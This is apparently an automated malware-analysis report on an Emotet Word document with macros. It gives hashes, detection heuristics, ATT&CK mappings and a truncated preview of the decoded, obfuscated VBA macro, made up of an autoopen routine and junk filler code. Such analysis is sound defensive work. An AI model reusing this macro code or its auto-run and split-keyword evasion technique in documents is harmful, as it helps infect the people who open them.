Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9ff3aaa377fbdb25…

MALICIOUS

Office (OLE)

193.1 KB Created: 2019-04-12 12:20:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: f9cddfaf2fe76b59153d2ae8380cfd95 SHA-1: 2011620c9c98d2c86c0d149896869f578132191f SHA-256: 9ff3aaa377fbdb25692e2c9624a684af93324259564ac9921f31b439d9be3e22
342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an autoopen subroutine that utilizes GetObject and CreateObject to launch the Win32_Process WMI object. This is a common technique used by Emotet to download and execute a second-stage payload. The macro also exhibits obfuscation by splitting keywords like 'winmgmts'.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6939171-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6939171-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34038 bytes
SHA-256: f04d753af27d91a0e78774645f5cf999f07ed12a4e0b8b24b727d2cfb5ff275c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UZxAXDAc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fA_AXGwk"
Attribute VB_Base = "0{35737B33-D264-413F-A283-644C8B2A5A08}{D32AB7A6-ADEF-49C6-8D1E-29C4680F564D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "JACxAGo"
Attribute VB_Base = "0{807BA783-60FE-49A8-8200-7B67AB2DBCC2}{1D3D10F9-0479-4405-85E3-721E96B778F7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "uwUAUA"
Sub autoopen()
   If i1GA4AA = ID1k4ZA Then
 oxwx__ = cAAkQA - RAAA_A
      Select Case wAUAB4
         Case 588386181
            kkUXQAw1 = CVar(554295234 * Rnd(bAAAAA * Round(256948051) / 348690530 * CLng(570690348 * Sqr(zDDkAD4Z))))
            NAAAUo = Round(FZABG4Z)
         Case 681351160
            aDw1XB = EAGAUAA
            IAUXA_ = Atn(1732346)
      End Select
End If
   If TDkAkA4 = hUBkxD Then
 IZAQUQQA = AxwcQA - pGoZBAA
      Select Case BQADQAk
         Case 208457868
            ncA4UkAB = CVar(327734327 * Rnd(wCBUAABG * Round(929152027) / 823496219 * CLng(975040109 * Sqr(ZQBkA1))))
            HxQA_AZU = Round(ZkQDBA)
         Case 713194317
            OQGAQAx = MAAAoAAA
            pXA1UQZk = Atn(538810215)
      End Select
End If
vADXZUZ
   If j_kwAAA = nU_QQ4 Then
 jCGwoAcU = GDAwcx1x - jAAAA_
      Select Case pXAZAxZ
         Case 265077919
            oUAZ1D = CVar(791718496 * Rnd(bUA_QAD * Round(64452510) / 428964906 * CLng(621909268 * Sqr(WAAAAQA))))
            lUAxwAAk = Round(XUCAkD)
         Case 727906753
            TCDAQAD = fA1AUQAU
            Po_CZDc = Atn(70216692)
      End Select
End If
   If EAZAAQA = i_1cwA Then
 IwXXCc = TAwAZw - pAAwDZUk
      Select Case OAZAx1
         Case 738969049
            rG_kAxAU = CVar(475095808 * Rnd(jAABXBcw * Round(972708045) / 656830629 * CLng(505218073 * Sqr(pUAGxxA))))
            RUAAZGXB = Round(UUZBAC)
         Case 140385174
            bAAABA = d4G_QA
            sQBD1x = Atn(121502054)
      End Select
End If
   If ZDAAkGA4 = OUUc4UA Then
 UDoAXGUA = Z1kQGBQw - NBAUZB
      Select Case p_xAAG_
         Case 351942139
            jDAQCUU = CVar(350407286 * Rnd(BAAAoD_ * Round(828487293) / 197963892 * CLng(202889132 * Sqr(HDDoBAA))))
            QCk4XG = Round(XcAUA1D)
         Case 664271870
            vwAAUUxC = Doc1UA
            jBUGUwA = Atn(222017012)
      End Select
End If
End Sub

Attribute VB_Name = "cADAAQ"
Function vADXZUZ()
On Error Resume Next
   If DQX_coB_ = OwA1Qk Then
 kGQoBkA4 = M4GAkwD - nAcUcGA
      Select Case FAkUDB
         Case 866480215
            KCDkDA = CVar(366197351 * Rnd(SBDCwAG * Round(285581266) / 265808453 * CLng(729311465 * Sqr(KUUAZ1A))))
            DB_cooD = Round(hAQAD4)
         Case 92158483
            LAAAkU = cDcBxx
            OAACDx1G = Atn(209100693)
      End Select
End If
   If M4AQQ4k = nQAUCAAk Then
 joDck1ZC = aAAD4A - kZ1UDcU
      Select Case W4AUQBAA
         Case 578658808
            bwAGBZU = CVar(318961311 * Rnd(pAcDAw_ * Round(307223537) / 781895672 * CLng(98801211 * Sqr(WDAwAco))))
            AAUA_wAA = Round(DAAAQAA)
         Case 102899066
            AAAADAXA = WAQQQ1
            wxAZXZQ = Atn(170302334)
      End Select
End If
If 4338 < 82790 Then
iAAAZ4 = 0
   If KDA4AAAc = EB4UABAA Then
 rU_QcA = GXCBUAU - zAAA1AAA
      Select Case JAxACUAA
         Case 828487660
            hcQAokBQ = CVar(862481011 * Rnd(vADXcA * Round(529826407) / 746932916 * CLng(719578481 * Sqr(UAAkCcAG))))
            lxA_AAAZ = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.